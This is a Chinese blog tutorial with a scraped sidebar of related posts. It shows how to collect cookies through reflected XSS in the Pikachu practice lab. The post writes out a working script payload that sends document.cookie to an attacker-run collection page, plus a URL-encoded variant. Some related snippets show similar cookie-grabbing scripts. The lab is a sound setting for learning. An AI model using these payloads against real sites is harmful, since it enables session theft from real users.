xss收集cookie方法(以pikachu靶场举例)

最新推荐文章于 2024-04-12 05:08:13 发布
最新推荐文章于 2024-04-12 05:08:13 发布
阅读量808 收藏 10
点赞数 13
文章标签: xss 前端 网络安全 经验分享 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59047731/article/details/135572182
版权

xss收集cookie方法(以pikachu靶场举例)

前言

本文提到的收集cookie的后台页面来自于pikachu靶场,只是把它单独提出来弄成一个网站(完整安装皮卡丘的安装包中都有这个pkxss文件的)

在这里插入图片描述

1、首先创建一个显示收集到cookie的页面

在这里插入图片描述

注意:注意这个地方这个cookie.php的文件位置,我们要访问这个收集cookie的文件路径应该是:
http://主机地址/pkxss/xcookie/cookie.php

2、收集方法

2.1我们可以构建一个偷cookie的payload:

<script> document.location = 'http://主机地址/pkxss/xcookie/cookie.php?cookie='+document.cookie; </script>

2.2接下来在pikachu靶场中反射性XSS中试一试:

在这里插入图片描述

输入构造好的payload

<script>document.location='http://indexof/pkxss/xcookie/cookie.php?cookie='%2bdocument.cookie; </script>

%2b经过url解码之后就是加号了,之所以不能直接填加号是因为你在输入框输入的payload,最终是要放在url中的

在这里插入图片描述

因为这个输入框限制了输入字符数量,所以我们把构造好的payload直接放在url中

在这里插入图片描述

回车,跳转到首页

因为这里我重定向到pikachu的首页了

在这里插入图片描述

2.3查看偷取到的cookie

在这里插入图片描述
完成

落樱坠入星野
关注
  • 13
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
pikachu靶场,可用于web渗透练习
05-19
1. **基础漏洞**:Pikachu靶场涵盖了常见的Web漏洞,如SQL注入、XSS跨站脚本、文件包含、命令注入等。通过这些挑战,用户可以学习到如何识别和利用这些漏洞。 2. **认证与授权**:靶场中可能包含对用户认证和权限...
pikachu靶场包含网络安全中常见的漏洞
11-08
"Pikachu靶场"是一个专门为网络安全爱好者和专业人士设计的实战演练平台,它集成了多种网络安全领域中的经典漏洞,帮助用户深入理解和掌握这些漏洞的原理、利用方法以及防范措施。这个靶场涵盖了XSS跨站脚本攻击、...
XSS攻击(1), 测试XSS漏洞, 获取cookie
探测???
10-18 1565
XSS(Cross-Site Scripting), 跨站攻击脚本, XSS漏洞发生在前端, 依赖于浏览器的解析引擎, 让前端执行攻击代码. XSS其实也算注入类的攻击, XSS代码注入需要有JavaScript编程基础.XSS的原理就是开发者没有对输入内容进行过滤, 导致通过攻击者精心构造的前端代码, 输入后和原来的前端代码产生混淆, 形成新的页面语句, 并且新的页面代码能够被浏览器解析并输出.:如果受害者具有某些特权,例如网站管理员,攻击者可能会利用XSS漏洞,使用受害者的权限对网站进行未授权的修改。
Web应用安全:XSS盗取cookiepayload(实验习题).docx
06-17
Web应用安全:XSS盗取cookiepayload(实验习题).docx
XSS平台搭建及后台使用(cookie获取
最新发布
2302_79885863的博客
04-12 1084
点击XSS后台,这就是我们收集cookie的网站,第一次进入需要初始化,如果你的数据库密码改了的就要去靶场的根目录的pkxss/inc/config.inc.php把链接数据库密码改成一致(案列靶场是这个,反正就是要找到这个配置文件)执行完之做了一个php的重定向,做完上面操作,保存完数据库之后,重新给你访问了一下这个网址,这个网址应该改成存在漏洞的网站的IP。然后我们把留言删除,刚刚我们知识测试是否存在有这个漏洞,然后我们现在想要获取cookie,需要构造代码了。这里的IP是能和虚拟机通信的,
简单的利用XSS获取用户cookie
shy的博客
10-25 4284
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞。XSS攻击的危害主要有盗取用户cookie、跳转到
XSS漏洞利用之cookie获取
good good study
08-01 9917
目录 环境搭建 盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。 环境搭建 思路:攻击者本地搭建的一个网站存在xss漏洞,并且在与网站同一个ip的服务器中使用浏览器进行了登录,此时访问了一个恶意链接,这个恶意链接,直接将cookie获取并发送到hacker服务
XSS基础及实战(XSS提取cookie并登录的)
qidiandexiaowu
09-06 8042
该学新知识了! 目录XSS基础XSS分类反射型XSS的利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
pikachu靶场搭建
02-27
pikachu靶场就是一个这样的模拟环境,它允许你尝试不同的攻击方法,学习漏洞利用技术。 在搭建pikachu靶场的过程中,你需要准备一台运行Linux操作系统的服务器或者虚拟机。首先,从提供的压缩包"pikachu-master"中...
Web应用安全:XSS盗取cookiepayload.pptx
06-18
XSS 盗取cookie payload 4 Cookie的后利用 3 XSS 盗取cookie payload 实例演示 2 XSS 盗取cookie payload 原理分析 1 cookie简介 目录 cookie简介 Cookie 并不是它的原意“甜饼”的意思, 而是一个保存在客户机中的简单的文本文件, 这个文件与特定的 Web 文档关联在一起, 保存了该客户机访问这个Web 文档时的信息, 当客户机再次访问这个 Web 文档时这些信息可供该文档使用。 举例来说, 一个 Web 站点可能会为每一个访问者产生一个唯一的ID, 然后以 Cookie 文件的形式保存在每个用户的机器上。 也就是如果我们获取到了用户访问网站的cookie,我们就能通过这个cookie,以用户的身份访问该网站。 原理分析 攻击者将可以获取并发送管理员的cookie的恶意XSS脚本到管理员访问的网站。 当管理员访问网站的时候,恶意的XSS脚本将会被运行。 攻击者就可以接收到管理员自动发送的cookie。 原理分析 实例演示 1.攻击者发送恶意XSS脚本到网站中 本次我们使用上一节课程搭建的pikachu站点
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 3774
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
XSS跨站脚本攻击之——XSS平台搭建与——Cookie获取
温柔小薛的博客
04-05 1040
XSS平台搭建及Cookie获取 准备工作 利用pikachuXSS后台 pikachu\pkxss\inc目录下的config.inc.php 修改mysql用户名密码 登录后台 pikachu\pkxss\xcookie目录解读 cookie.php 获取cookie的API页面并存到攻击者平台数据库中 获取完后才能重定向一个可信网站,起到迷惑用户隐藏攻击过程的作用 ...
XSS平台获取cookie
qq_41048303的博客
02-19 3583
XSS平台获取cookie 1.环境介绍 靶场pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
使用XSS漏洞获取cookies
Decaede的博客
01-26 1061
使用XSS漏洞获取cookies
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 1648
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
接收Cookie总结
网络安全。
01-14 3302
0x01 前言 最近总结了一下自己接收cookie方法,和大家分享一下。来源于平时的积累和良师益友的分享。 0x02 进入正题 一:通过XSS平台接收cookie。 这个相信每个人都用过,是大家接收cookie最常用的一种方式。 1.去网上的XSS平台或者自己搭建的XSS平台新建一个项目。 2.在这里我们勾选默认模块,默认模块就是盗取cookie的,然后选择keepsession。 3.然后...
pikachu靶场xss
05-24
Pikachu 靶场是一款用于学习和测试 Web 安全漏洞的免费开源平台,其中包括了 XSS 攻击的相关漏洞。 首先,你需要在本地安装好 Pikcahu 靶场,然后进入靶场XSS 模块。在该模块中,你可以看到已经准备好的一些 XSS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值